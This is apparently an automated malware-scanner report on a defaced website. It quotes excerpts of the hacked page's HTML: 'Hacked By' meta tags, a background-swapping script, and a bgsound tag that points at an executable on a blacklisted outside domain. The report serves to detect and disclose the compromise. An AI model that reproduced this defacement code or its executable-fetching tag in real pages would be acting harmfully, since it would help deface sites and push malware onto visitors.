New scan:

Malware Scanner report for l-ngv2015sandiego.com

Malicious/Suspicious/Total urls checked
0/1/3
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By peyman siyahi  (70 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.l-ngv2015sandiego.com/
200 OK
Content-Length: 3681
Content-Type: text/html
suspicious
Page code contains blacklisted domain: ter.xzn.ir

...[687 bytes skipped]...
i" name="Abstract">
<meta content="Hacked By peyman siyahi" name="description">
<link rel="shortcut icon" href="http://up.irsecteam.org/do.php?img=1430">
<title>Hacked By peyman siyahi</title>
<link rel="stylesheet" type="text/css" href="http://rozup.ir/up/nootepad/css/indpeyman.css" media="all" />
</head>
<div align="center"><br>
<bgsound src="http://ter.xzn.ir/download.exe" loop="-1">
</div>
<head>
<script>
// peyman siyahi
var bg = ["http://zica.hostoi.com/up/cb82dbdcda47.jpg","http://zica.hostoi.com/up/0c767c26cb31.png"];
setInterval(function(){
var rand = Math.floor(Math.random()*bg.length);
document.body.style.background='#000 url('+bg[rand]+')no-repeat fixed center';
document.body.style.transition='all 1.2s ease';
},3000);
</script>
<st
...[2687 bytes skipped]...

Deface/Content modification. The following signature was found: Hacked By peyman siyahi

...[177 bytes skipped]...
ment.title = msg.substring(pos, msg.length) + msg.substring(0, pos);
pos++;
if (pos > msg.length) pos = 0
window.setTimeout("scrollMSG()",200);
}
scrollMSG();
</script>
<p>




<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta content="Hacked By peyman siyahi" name="subject">
<meta content="Hacked By peyman siyahi" name="Abstract">
<meta content="Hacked By peyman siyahi" name="description">
<link rel="shortcut icon" href="http://up.irsecteam.org/do.php?img=1430">
<title>Hacked By peyman siyahi</title>
<link rel="stylesheet" type="text/css" href="http://rozup.ir/up/nootepad/css/indpeyman.css" media="all" />
</head>
<div align="center">&l
...[3228 bytes skipped]...


http://www.l-ngv2015sandiego.com/ID
404 Not Found
Content-Length: 319
Content-Type: text/html
clean
http://www.l-ngv2015sandiego.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: l-ngv2015sandiego.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: l-ngv2015sandiego.com
Referer: http://www.google.com/search?q=l-ngv2015sandiego.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=l-ngv2015sandiego.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://l-ngv2015sandiego.com/

Result: l-ngv2015sandiego.com is not infected or malware details are not published yet.